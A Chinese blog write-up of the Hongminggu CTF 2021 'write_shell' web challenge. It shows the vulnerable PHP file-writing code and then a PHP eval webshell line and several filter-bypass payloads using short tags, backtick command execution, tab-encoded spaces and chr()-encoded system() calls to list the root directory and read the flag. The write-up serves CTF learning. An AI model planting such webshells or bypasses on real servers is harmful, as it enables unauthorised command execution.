[红明谷CTF 2021]write_shell

最新推荐文章于 2023-11-13 22:28:36 发布
最新推荐文章于 2023-11-13 22:28:36 发布
阅读量592 收藏
点赞数
分类专栏: CTF 文章标签: php CTF yym68686 BUUCTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45646006/article/details/120913165
版权

[红明谷CTF 2021]write_shell

打开网页,发现源代码:

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

先输入:

/?action=pwd

发现网页回显写入文件index.php的路径:

sandbox/ae93446ce05e0cb626c6029f1a1eaef2/

连续刷新后,发现上短时间内不变,所以我们把数据写入index.php后,可以根据这个链接访问这个文件。再写入数据:

/?action=upload&data=ls

然后访问:

sandbox/ae93446ce05e0cb626c6029f1a1eaef2/

发现已经写入成功,那么只需要把木马写入index.php文件就可以从后台登录了,比如写入

<?php @eval($_POST["password"]);?>

但waf过滤了php,空格。所以不能用<?php,但php还有短标签,可以尝试使用<?= ?>代替<?php ?>,同时php会把反引号内的内容当作命令执行,使用反引号运算符```的效果与函数 shell_exec() 相同。所以我们尝试写入:

/?action=upload&data=<?=`ls%09/`?>

在正常PHP5中,支持如下4种PHP标签:

  • 通过<?php标签
  • 通过<?标签
  • 通过<%标签(默认不开启,PHP7后被移除)
  • 通过<script language="php"> 标签(PHP7后被移除)

References

https://www.leavesongs.com/PENETRATION/dynamic-features-and-webshell-tricks-in-php.html

输入:

/?action=pwd

发现网页回显写入文件index.php的路径:

sandbox/8262c7279f565af9dec3dbfeeb95c407/

访问路径,发现已经成功读取根目录文件:

bin boot dev etc flllllll1112222222lag home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var

发现flag文件为flllllll1112222222lag,尝试再次写入:

/?action=upload&data=<?=`cat%09/flllllll1112222222lag`?>

或者:

/?action=upload&data=<?=`cat%09/f*`?>

或者:

/?action=upload&data=<?=`cat\t/*`?>

或者:

/?action=upload&data=<?=system('cat /flllllll1112222222lag')?>

但需要转一下码,输入:

/?action=upload&data=<?=system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(108).chr(108).chr(108).chr(108).chr(108).chr(108).chr(49).chr(49).chr(49).chr(50).chr(50).chr(50).chr(50).chr(50).chr(50).chr(50).chr(108).chr(97).chr(103))?>

再输入:

/?action=pwd

发现网页回显写入文件index.php的路径:

sandbox/8262c7279f565af9dec3dbfeeb95c407/

访问路径,发现flag。

References

BUU-日刷-[红明谷CTF 2021]write_shell-call_简单绕过和??

[红明谷CTF 2021]write_shell - 「配枪朱丽叶。」

inanb

红明谷CTF:write_shell

[红明谷CTF 2021]write_shell_cjdgg的博客-程序员宝宝 - 程序员宝宝

yym68686
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[红明谷CTF 2021]write_shell1
wwwyyyxxxx的博客
03-04 341
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格被过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
自己动手写shell命令之write
yao_hust_iAC的专栏
10-17 3591
Linux下write命令允许用户跟其他终端上的用户对话。用c语言实现shell命令write,代码如下: #include #include #include #include #include #include #include #include #include char * get_terminal_name(char *); char * get_terminal_
BUUCTF:[红明谷CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1293
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
红明谷杯数据安全大赛
qq_53755216的博客
04-04 281
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
buuctf-write_shell(命令执行)
m0_62094846的博客
05-21 279
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
Write a Shell in C 学习(一)
Number____10的博客
11-12 735
自己的C很差很差,所以趁着这一次写一个shell的作业来提高一下自己C的编程水平。 教程来自于https://brennan.io/2015/01/16/write-a-shell-in-c/,此为个人学习笔记。这个教程中的shell实现了三个功能,分别为cd,help,exit。 希望此笔记可以使初学者毫无阻碍的写成一个shell,并对每一个句子知其所以然。 由于我本人亦是初学者,内容难免...
[GFCTF 2021]where_is_shell
最新发布
沈理大学牲的博客
11-13 397
在ROP攻击中,攻击者利用程序中存在的这种gadget,通过精心构造的数据将程序控制流引导到这个gadget,从而实现对程序行为的控制。通常情况下,攻击者会将需要的参数放置在栈上,然后利用ROP链将控制流引导到 "pop rdi;ret" 这样的gadget,将参数加载到合适的寄存器中,然后再执行调用目标函数的ret指令。在x86_64架构中,这个gadget的作用是从栈中弹出一个数值,并将其赋值给RDI寄存器,然后进行返回。先覆盖到地址,然后执行ret,ret用来返回弹出的地址,然后执行pop_rdi;
2021GFCTF
unexpectedthing的博客
07-07 1533
GFCTF2021
[NPUCTF2020]ezinclude
yym68686
10-17 2272
目录[NPUCTF2020]ezinclude方法一 利用php7 segment fault特性(CVE-2018-14884)方法二 利用 session.upload_progress 进行 session 文件包含 [NPUCTF2020]ezinclude 打开网页,查看源代码,发现注释提示: md5($secret.$name)===$pass 输入url: /?name=1 变化name的值,发现cookies的hash值在不断变化,说明hash值跟name的取值有关,但又不完全是name
BUUCTF Web 第一页全部Write ups
yym68686
03-26 1819
更多笔记,可以关注yym68686.top 目录[极客大挑战 2019]Http[ACTF2020 新生赛]Exec[极客大挑战 2019]Secret File[HCTF 2018]WarmUpReferences[极客大挑战 2019]EasySQLReferences[强网杯 2019]随便注方法一方法二References[极客大挑战 2019]Havefun[SUCTF 2019]EasySQL方法一方法二References[ACTF2020 新生赛]IncludeReferences[极客大挑
[WUSTCTF2020]CV Maker
yym68686
09-24 1521
[WUSTCTF2020]CV Maker 打开网页,先登录,发现可以更改头像,想到可能是文件上传漏洞,试一试上传PHP文件,发现页面报错:exif_imagetype not image!,查阅PHP手册: exif_imagetype (PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8) exif_imagetype — 判断一个图像的类型,exif_imagetype() 读取一个图像的第一个字节并检查其签名。 说明exif_imagetype只检查文件头,所以我们可以
[网鼎杯 2020 白虎组]PicDown
yym68686
10-31 1351
[网鼎杯 2020 白虎组]PicDown 打开网页发现输入文本框,有可能是读取文件,输入: ../../../../../etc/passwd 或者 /etc/passwd 文件用记事本打开后: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin s
BUUCTF Web 第二页全部Write ups
yym68686
07-09 1238
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值